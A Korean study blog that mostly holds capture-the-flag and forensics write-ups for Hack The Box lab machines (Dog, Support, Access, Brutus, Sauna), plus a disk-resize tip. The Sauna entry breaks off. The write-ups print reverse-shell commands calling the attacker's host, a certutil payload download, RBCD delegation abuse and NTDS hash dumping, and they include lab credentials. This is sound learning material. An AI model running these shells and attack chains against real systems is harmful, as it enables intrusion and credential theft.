dyp4r's Study Blog

VMware Ubuntu 하드디스크 용량 변경하기

dyp4r — Mon, 23 Feb 2026 09:25:30 +0900

용량을 늘리고자하는 VM Settings에서 Hard Disk -> Expand disk capacity를 통해 용량을 변경한다.

스냅샷이 존재할 경우 위와 같이 Expand 버튼이 비활성화되는데, 스냅샷을 모두 제거하면 활성화된다.

"df -h"나 "lsblk"로 대상 디스크를 확인하고 아래 명령어를 실행한다.

sudo growpart /dev/sda 1
sudo resize2fs /dev/sda1

[Linux] Dog

dyp4r — Sun, 13 Jul 2025 12:09:45 +0900

Challenge Information

Enumeration & Attack Planning

Network

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-12 22:02 EDT
Nmap scan report for 10.10.11.58
Host is up (0.067s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.41 seconds

ssh와 http 포트가 열려 있다.

http

로그인 기능이 있는 사이트다.

사이트 하단을 통해 Backdrop CMS를 사용중이라는 사실을 확인할 수 있다.

$ ffuf -u http://10.10.11.58/FUZZ -w /usr/share/wordlists/dirb/common.txt              
<SNIP>

.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 75ms]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 75ms]
**.git/HEAD               [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 76ms]**

사이트 상으로는 공격할만한 부분이 보이지 않아 Sub Directory를 조사해봤다.

.git 폴더가 노출되어 있는 것을 확인할 수 있다.

$ git-dumper http://10.10.11.58/.git ./dog_git
<SNIP>
[-] Fetching http://10.10.11.58/.git/objects/ff/bf269cbc54df0e48e358bb037f9106ec5cba5d [200]
[-] Fetching http://10.10.11.58/.git/objects/ff/c8b7a2f5179db2788971de0e8a265032d6ddab [200]
[-] Fetching http://10.10.11.58/.git/objects/ff/c418375000d182c805974f2d004e92257178d8 [200]
[-] Fetching http://10.10.11.58/.git/objects/ff/d59fb7b29088f85bacacc0e7cc55a73a3dba97 [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 2873 paths from the index

$ ls ./dog_git
core  files  index.php  layouts  LICENSE.txt  README.md  robots.txt  **settings.php**  sites  themes

https://github.com/arthaud/git-dumper를 통해 git 폴더를 추출하고 웹 소스코드를 획득할 수 있다.

Exploit (Initial Access)

tiffany 웹 계정 획득

$ cat settings.php
<SNIP>

$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';

<SNIP>

settings.php를 통해 db credential을 획득할 수 있다. root:BackDropJ2024DS2024

이 계정으로는 웹 로그인에 실패했다.

$ git log   
commit 8204779c764abd4c9d8d95038b6d22b6a7515afa (HEAD -> master)
Author: root <**dog@dog.htb**>
Date:   Fri Feb 7 21:22:11 2025 +0000

    todo: customize url aliases.  reference:https://docs.backdropcms.org/documentation/url-aliases

git log에 dog@dog.htb 이메일을 확인해 획득한 비밀번호를 대입해봤지만 실패했다.

$ grep -r --exclude=*.css --exclude=*.js '@dog.htb' .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000    commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000    commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

비밀번호를 대입할 이메일들을 찾기 위해 grep을 사용해서 @dog.htb 가 들어간 항목들을 검색해봤다.

tiffany@dog.htb 를 확인할 수 있었고 위에서 얻은 DB 비밀번호를 대입해 웹 로그인에 성공했다.

tiffany@dog.htb:BackDropJ2024DS2024

www-data 권한 획득

Functionality 탭에서 'Install Module' 메뉴를 확인할 수 있다. 사용자가 직접 모듈을 업로드할 수 있는 점을 고려하면, 초기 침투에 적합한 벡터로 활용될 수 있다.

일단 backdropcms의 module 작성 방법에 대해 아는게 없기 때문에, 공개된 모듈이 있나 검색해봤다.

https://backdropcms.org/modules 이 사이트를 통해 모듈이 공유되고 있다.

$ cat shs.api.php 
<?php
**system("busybox nc 10.10.14.4 9999 -e /bin/sh");**

이 중 "Simple hierarchical select" 모듈을 다운받아 php 코드에 reverse shell을 얻게 해주는 코드를 삽입했다.

그 후 소스 코드를 통해 식별한 module 설치 경로에서 reverse shell 코드를 삽입한 php 파일을 실행해 초기 침투를 했다.

Post-Exploit

johncusack으로 권한 상승

home 폴더를 확인하니 jobert 와 johncusack 이 있었다.

위에서 획득한 DB 비밀번호를 이 두 계정에 대입하니 johncusack 으로 권한 상승 할 수 있었다.

root로 권한 상승

johncusack은 sudo 명령어를 통해 bee 바이너리를 실행할 수 있다.

https://www.hackingdream.net/2020/03/linux-privilege-escalation-techniques.html

GTFOBins에는 bee를 통한 LPE 방법이 나와 있지 않아, 구글링을 통해 관련 글을 찾았고, 거기에 소개된 명령어를 이용해 root 권한 상승에 성공했다.

[HTB Sherlocks] Brutus

dyp4r — Mon, 5 May 2025 16:10:10 +0900

배경

auth.log, wtmp 로그를 주로 분석하는 문제다. 이름처럼 bruteforce 시나리오를 다루게 된다.

auth.log와 wtmp 파일 그리고 wtmp 파일을 파싱해주는 utmp.py가 주어져 있다.
(wtmp 파일은 binary data기 때문에 눈으로 확인하려면 파싱이 필요하다.)

auth.log?

auth.log는 Linux에서 인증 및 권한 관련 이벤트를 기록해주는 로그 파일이다.

지금까지는 단순 로그인 기록만 나와 있는 로그인 줄 알았지만, 이번 문제를 통해 sudo, su 같은 권한 관련 행위와 사용자 생성, 그룹 추가와 같은 행위들도 나와 있다는 것을 깨달았다.

이 로그 파일을 분석하면 로그인 시도와 성공 여부, 세션 ID, Timestamp 등을 얻을 수 있기 때문에 bruteforce 공격을 식별할 수 있을 것이다.

wtmp?

처음 알게 된 로그 파일이다. /var/log/wtmp 경로에 있다.

바이너리 형식이기 때문에 파싱이 필요하며, 로그인 및 로그아웃, 시스템 부팅 같은 세션 이벤트가 기록된다고 한다.

last 명령을 사용했을 때 보여지는 세션 기록이 바로 이 wtmp 파일의 내용이다.

auth.log VS wtmp

처음에는 둘 다 로그인 기록을 보여주는 로그이기 때문에 큰 차이가 없다고 생각했다.

하지만 Task 3 문제를 수행하면서, 침해 대응 관점에서는 이 둘의 차이를 명확히 이해하는 것이 매우 중요하다는 사실을 깨달았다.

auth.log : 인증 시도와 성공 여부를 기록
wtmp : 인증 성공 이후 실제로 생성된 세션 정보를 기록

auth.log를 통해서는 공격자가 언제, 어떤 계정으로 로그인 시도를 했고 성공했는지를 확인할 수 있다.

반면, wtmp에서는 인증이 성공한 후 실제로 시스템에 세션이 생성된 시점을 알 수 있다.

결국 공격자가 시스템 내부에서 실제 행위를 시작하는 시점은 세션이 생성된 이후이기 때문에, 공격 타임라인을 추적하려면 wtmp에 기록된 로그인(세션 생성) 시점을 기준으로 분석하는 것이 핵심이다.

Task1

auth.log를 분석해 보세요. 공격자가 무차별 대입 공격을 실행하는 데 사용한 IP 주소는 무엇입니까?

$ cat auth.log | more
...

Mar  6 06:31:33 ip-172-31-35-28 sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2331]: Failed password for invalid user admin from 65.2.161.68 port 46436 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2332]: Failed password for invalid user admin from 65.2.161.68 port 46444 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2335]: Failed password for invalid user admin from 65.2.161.68 port 46460 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2337]: Failed password for invalid user admin from 65.2.161.68 port 46498 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2334]: Failed password for invalid user admin from 65.2.161.68 port 46454 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2338]: Failed password for backup from 65.2.161.68 port 46512 ssh2

...

cat auth.log | awk '/Failed password/ && /from 65.2.161.68/ && /sshd/' | wc -l
48

로그를 조금만 살펴봐도 바로 확인할 수 있다.

65.2.161.68 에서 48건의 실패 시도가 확인된다.

답 : 65.2.161.68

Task2

브루트포스(Brute-force) 공격이 성공하여, 공격자가 서버의 한 계정에 접근할 수 있게 되었습니다. 이때 공격자가 접근한 계정의 사용자명은 무엇인가요?

$ cat auth.log | more
...

Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2

...

로그 상단에서 로그인 성공 메시지를 확인할 수 있다.

이를 참고해서 공격자의 로그인 성공 여부를 확인하기 위해, 공격에 사용된 IP 주소(65.2.161.68)를 기준으로 Accepted password 로그를 검색해 보았다.

$ cat auth.log | awk '/Accepted password/ && /from 65.2.161.68/ && /sshd/'        
**Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2**
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2

총 세 건의 로그인 성공 로그가 존재하며, 이 중 가장 먼저 로그인에 성공한 계정은 root임을 확인할 수 있다.

답 : root

Task3

공격자가 수동으로 서버에 로그인하여 터미널 세션을 생성하고, 본인의 목적을 수행하기 시작한 시점을 식별하시오. 이때 로그인 시간은 인증 시간과 다르며, 해당 정보는 wtmp 아티팩트에서 확인할 수 있습니다.

$ python3 utmp.py wtmp | grep "65.2.161.68"       
"type"    "pid"    "line"    "id"    "user"    "host"    "term"    "exit"    "session"    "sec"    "usec"    "addr"                         
**"USER"    "2549"    "pts/1"    "ts/1"    "root"    "65.2.161.68"    "0"    "0"    "0"    "2024/03/06 15:32:45"    "387923"    "65.2.161.68"**
"USER"    "2667"    "pts/1"    "ts/1"    "cyberjunkie"    "65.2.161.68"    "0"    "0"    "0"    "2024/03/06 15:37:35"    "475575"    "65.2.161.68"

세션 생성 정보는 wtmp 로그에 나와있으므로, 첨부된 utmp.py를 사용해 로그를 확인해 봤다.

세션 생성 시점이 2024/03/06 15:32:45 로 auth.log에 기록된 시간대와 차이가 있는 걸 확인할 수 있는데, 이는 utmp.py에서 내 로컬 환경의 시간대로 자동으로 변환해서 보여줘서 그렇다.

$ cat utmp.py
...
   sec = time.strftime("%Y/%m/%d %H:%M:%S", **time.localtime(float(sec))**)
...

따라서 UTC로 변환하면 2024-03-06 06:32:45 이다.

답: 2024-03-06 06:32:45

Task4

SSH 로그인 세션은 로그인 시 세션 번호가 부여되어 추적됩니다. 질문 2에서 언급된 사용자 계정에 대해, 공격자의 세션에 할당된 세션 번호는 무엇인가요?

$ cat auth.log | grep "Accepted password for root from 65.2.161.68 port 34782" -A 5
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
**Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.**
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Received disconnect from 65.2.161.68 port 46698:11: Bye Bye [preauth]
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Disconnected from invalid user server_adm 65.2.161.68 port 46698 [preauth]
Mar  6 06:31:40 ip-172-31-35-28 sshd[2380]: Received disconnect from 65.2.161.68 port 46710:11: Bye Bye [preauth]

auth.log에서 확인할 수 있다. 34다.

답: 34

Task5

공격자는 서버에서 지속적인 접근 권한을 유지하기 위한 전략의 일환으로 새로운 사용자 계정을 추가하였으며, 이 계정에 높은 권한을 부여하였습니다. 이 새로 생성된 사용자 계정의 이름은 무엇인가요?

auth.log에서 확인 가능하다.

공격자는 root로 총 두 번의 로그인을 했는데, 첫 번째 로그인은 bruteforce 과정 중에 시도한 것으로 추측되고 두 번째 로그인이 공격자가 직접 접속해 행위를 시작한 시점이다. (wtmp의 세션 생성 시점과 일치)

...
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
**Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1**
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar  6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
...

해당 시점부터 로그를 살펴보면 useradd 이벤트에서 cyberjunkie ****사용자 생성을 확인할 수 있다.

답: cyberjunkie

Task6

새로운 계정을 생성하여 지속성을 유지하는 데 사용된 MITRE ATT&CK 서브 기법 ID는 무엇인가요?

T1136.001이다.

답: T1136.001

Task7

*auth.log 기준으로, 공격자의 첫 번째 SSH 세션은 언제 종료되었나요?*

...
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: **New session 37 of user root.
...**

실제로 공격자가 접속한 세션의 ID는 37이다.

$ cat auth.log | grep "session 37"      
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar  6 **06:37:24** ip-172-31-35-28 systemd-logind[411]: Removed session 37.

세션 ID로 필터링하면 종료 시점은 2024-03-06 06:37:24 인 것을 알 수 있다.

답: 2024-03-06 06:37:24

Task8

공격자는 백도어 계정으로 로그인한 후, 부여된 높은 권한을 이용해 스크립트를 다운로드했습니다. 이때 sudo를 사용해 실행한 전체 명령어는 무엇인가요?

sudo를 사용해 실행한 명령어는 auth.log에 남는다.

backdoor 계정인 cyberjunkie의 세션 생성 시점부터 살펴보면 된다.

...
Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
...

curl로 linux persistence toolkit인 linper.sh를 다운받는 것을 확인할 수 있다.

답: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

마무리

갑자기 침해사고 분석에 관심이 생겨 도전하게 된 첫 번째 셜록 문제였다.

확실히 평소에 공격 기법 위주로 공부해왔기 때문에, “아, 이런 시나리오로 침투했겠구나” 하는 그림이 머릿속에 바로 그려졌다.

다만, 아티팩트에 대한 지식이 부족하다는 점은 확실히 느껴졌고, 이 부분은 앞으로 보완이 필요하겠다고 생각이든다.

[AD] Support

dyp4r — Mon, 7 Oct 2024 14:46:28 +0900

Challenge Information

Enumeration & Attack Planning

Network

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# nmap -sV 10.10.11.174
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-07 01:04:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# nmap -sV -p 5985 10.10.11.174
PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

AD 환경이고 도메인은 support.htb 다.

LDAP

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# ldapsearch -H ldap://10.10.11.174:389/ -D '' -w '' -b "DC=support,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

ldap null binding은 실패했다.

SMB

Guest 접근에 성공했다.

support-tools라는 공유에 접근 권한이 있다.

support-tools라는 공유명에 걸맞게 notepad, wireshark 등 기술 지원에 필요한 도구들을 확인할 수 있었다.

다른 툴들은 다 이미 존재하는 도군데 UserInfo는 공개된 툴이 아닌 것 같아 분석을 해볼 필요가 있을 것 같다.

guest session으로 RID Bruteforcing을 해 Domain User 목록을 얻었다.

이를 통한 AS-REP Roasting은 실패했다.

Exploit (Initial Access)

.net assembly로 작성된 프로그램이라 dnspy로 분석을 진행했다.

ldap 관련 처리를 수행하는 프로그램임을 알 수 있었고 ldap 유저의 (암호화됐지만)하드코딩된 비밀번호도 찾을 수 있었다.

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"

encoded_bytes = base64.b64decode(enc_password)

key_bytes = key.encode('ascii')

decoded_bytes = bytearray()

for i in range(len(encoded_bytes)):
    decoded_byte = encoded_bytes[i] ^ key_bytes[i % len(key_bytes)] ^ 223
    decoded_bytes.append(decoded_byte)

decoded_password = decoded_bytes.decode('utf-8')

print("Decoded Password:", decoded_password)

위 코드를 통해 nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 가 나왔다.

획득한 ldap 유저의 credential로 ldap query를 날리니 성공했다.

아쉽게도 winrm 권한은 존재하지 않는다.

support 유저의 info 속성에서 비밀번호로 추정되는 값을 찾았다.

support 유저로 winrm 접속을 성공했고 user flag를 얻었다.

Post-Exploit

Surveying

Support 유저는 DC Computer Object에 대한 GenericAll 권한이 있는 것을 확인할 수 있다.

CanPSRemote(winrm 접속 권한) Edge가 분석을 방해한다면 지우면 된다.

Computer Object에 GenericAll 권한이 있을 경우 RBCD Attack이나 Shadow Credential 등의 공격을 사용하면 된다.

이 롸업에서는 RBCD Attack으로 풀이하겠다.

Attribute 수정이 가능하기 때문에 Targeted Kerberoasting, AS-REP Roasting을 시도하는 방법도 있겠지만, 기본적으로 Computer Object는 16자 이상의 무작위 영대소문자로 구성된 비밀번호를 사용하기 때문에 TGT, TGS를 얻어도 크랙이 불가능해 활용할 수가 없다.

GenericAll 권한으로 DC Object의 AllowedToActOnBehalfOfOtherIdentity 속성에 우리가 제어하는 Object를 넣을 것이다.

이 속성은 위임(delegation)을 허용할 object를 지정하는 역할을 하므로(일종의 trust list 느낌), 속성에 들어간 Object가 다른 계정을 사칭해(비밀번호를 몰라도 가능) DC Object에 접근할 수 있도록 해준다.

DC Object의 경우 Domain에 대한 DCSync 권한을 가지므로, Administrator를 사칭해 이 Object에 접근한다면 NTDS Dump가 가능할 것이다.

Privilege Escalation

RBCD Attack에 활용할 Computer Object를 하나 생성해 줬다.

사용자 계정은 여러 복합적인 이유 때문에 RBCD Attack에 활용하기에 적합하지 않다.반대로 컴퓨터 계정은 RBCD Attack를 수행하는데 문제가 없고 기본적으로 사용자는 (기본값) 10개의 컴퓨터 계정을 생성 가능하기 때문에, 보통 RBCD Attack의 첫 단계는 컴퓨터 계정 생성으로 진행된다.

아래는 사용자 계정으로 RBCD Attack을 해보는 글이다.보다 조건이 까다롭고 복잡하단 사실을 확인할 수 있을 것이다.
https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# impacket-rbcd support.htb/support:Ironside47pleasure40Watchful -delegate-to DC$ -delegate-from fake-computer$ -dc-ip 10.10.11.174 -action write
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] fake-computer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     fake-computer$   (S-1-5-21-1677581083-3380853377-188903654-5602)

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/"fake-computer$":"P@ssw0rd"
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

impacket-rbcd를 통해 생성한 fake-computer를 DC의 AllowedToActOnBehalfOfOtherIdentity 에 등록해줬다.

그 DC에 대한 cifs 서비스 티켓을 요청하면 성공적으로 Administrator의 ST를 획득할 수 있다.

만약 ST를 획득하는 과정에서 Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) 오류가 발생했다면 아래 글을 참고하면 된다.
https://dypar-study.tistory.com/196

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# export KRB5CCNAME=./Administrator.ccache

┌──(root㉿kali)-[~/Desktop/htb/Support]
└─# crackmapexec smb 10.10.11.174 -u Administrator --use-kcache --ntds                       
SMB         10.10.11.174    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.174    445    DC               [+] support.htb\ from ccache (Pwn3d!)
SMB         10.10.11.174    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.174    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
SMB         10.10.11.174    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.174    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
SMB         10.10.11.174    445    DC               ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
SMB         10.10.11.174    445    DC               support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
SMB         10.10.11.174    445    DC               smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::

획득한 ST로 NTDS를 dump한 후 winrm으로 접근해 flag를 획득했다.

[ETC] KRB_AP_ERR_SKEW(Clock skew too great)

dyp4r — Mon, 7 Oct 2024 14:35:19 +0900

support 문제를 풀다 발견한 오류다

Ticket을 받아오는 과정에서 위 사진처럼 KRB_AP_ERR_SKEW 오류가 뜨는 경우 시간대를 DC와 맞춰준다면 해결된다.

kerberos 인증 과정에서 현재 timestamp를 사용하는데, 이 때 로컬 시간과 DC의 시간이 다르면 발생하는 문제인 것 같다.

$ timedatectl set-ntp off # 시간 동기화 비활성화
$ rdate -n [dc ip] # dc ip에서 시간 정보를 가져와 동기화

[Windows] Access

dyp4r — Tue, 6 Aug 2024 13:47:33 +0900

Challenge Information

Enumeration & Attack Planning

Network

┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap -sV 10.10.10.98
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-08 06:05 EST
Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 06:09 (0:01:14 remaining)
Nmap scan report for 10.10.10.98
Host is up (0.23s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.80 seconds

OS는 Windows고 ftp, telnet, http 포트가 열려 있다.

HTTP

웹 사이트에서는 특별한 점을 발견하지 못했다.

웹 소스코드도 체크하고 sub directory enum도 해봤지만 나오는 것은 없었다.

ftp

anonymous 접속이 가능하다.

Backups, Engineer 폴더에서 각각 backup.mdb, Access\ Contol.zip 파일을 찾을 수 있었다.

Access\ Control.zip

먼저 Zip 파일에는 Access\ Control.pst(outlook 데이터 파일) 파일이 들어있는 것을 확인할 수 있지만 암호가 걸려 해제가 안된다.

# hashcat 형식 맞추기 위해 hash만 추출
$ zip2john ./Access\ Control.zip | cut -d ':' -f 2 > zip_hash
$ hashcat -a 0 -m 13600 ./zip_hash /usr/share/wordlists/rockyou.txt

zip2john으로 hash 추출 후 내장 rockyou로 크랙을 시도해봤지만 실패했다.

backup.mdb

mdb 파일은 Access DB 파일로 MS Access로 열거나 아래 사이트를 통해 온라인으로 확인할 수 있다.

https://mdbviewer.herokuapp.com/

확인해보면 많은 테이블이 나오는데, 그 중 credential 등의 유용한 정보가 있을 확률이 높은 user 테이블을 집중적으로 확인했다.

auth_user 테이블에서 admin, engineer, backup_admin 계정의 평문 password를 찾을 수 있었다.

Access\ Control.zip 파일을 가져온 폴더명이 engineer였으니 engineer의 비밀번호인 access4u@security 로 열릴 수도 있을 것 같다.

engineer 비밀번호로 압축해제에 성공했고 나온 pst 파일을 아래 링크의 pst 온라인 뷰어로 열어봤다.

https://goldfynch.com/pst-viewer/

security 계정의 password가 4Cc3ssC0ntr0ller 라는 정보를 얻을 수 있었다.

Exploit (Initial Access)

┌──(root㉿kali)-[~/Desktop/htb/access]
└─# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>type Desktop\user.txt
fb4db938b9864cb63ea99ff88f72bdd1

security 계정으로 telnet 접속에 성공했고 user flag를 얻었다.

user flag: fb4db938b9864cb63ea99ff88f72bdd1

Post-Exploit

Surveying

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

cmdkey를 통해 administrator 계정의 credential이 저장되어 있음을 확인했다.

Privilege Escalation

cmdkey에 저장된 credential은 runas /savecred 를 통해 사용할 수 있다.

당시 연습삼아 3가지 방법으로 목표를 달성했는데, 방법은 아래와 같다.

type & > 로 flag 추출

업로드 하기 귀찮아서 맨 처음 사용한 방법

administrator 권한으로 flag를 읽고 이를 >로 security 홈 폴더에 저장하면 확인이 가능하다는 것을(권한이 상속되기 때문) 이용했다.

nc를 통한 reverse shell

# attacker
$ python3 -m http.server 3333
$ nc -lvp 1234

# victim
C:\Windows\Temp>certutil -urlcache -split -f http://10.10.14.10:3333/nc64.exe
C:\Windows\Temp>runas /user:administrator /savecred "C:\Windows\Temp\nc64.exe -e cmd.exe 10.10.14.10 1234"

nc binary를 업로드 후 administrator 권한으로 reverse shell 획득

msfvenom 등으로 payload 생성 후 이를 실행 시켜도 된다.

force authentication

# attacker
$ impacket-smbserver test ./ -smb2support

# victim
C:\Users\security>runas /user:administrator /savecred "\\10.10.14.10\test\"

smb server를 연 후 강제 인증을 수행하도록 해 NetNTLM을 획득할 수 있다.

이는 PTH에 사용할 수 없으므로 크랙에 성공해야지만 의미가 있다.

이 말고도 방법은 굉장히 많다.

reg로 sam, system 덤프 후 ftp 디렉터리에 올려도 될 것 같다. (ftp 디렉터리 write 권한이 있다면)

[AD] Sauna

dyp4r — Tue, 16 Jul 2024 14:40:18 +0900

Challenge Information

Enumeration & Attack Planning

Network

┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap -sV 10.10.10.175
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-22 23:41 EST
Nmap scan report for 10.10.10.175
Host is up (0.23s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-23 12:42:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.52 seconds

열려 있는 포트들을 보아 DC인 것 같다.

SMB

null access는 성공했지만 share나 user는 enum 할 수 없었다.

LDAP

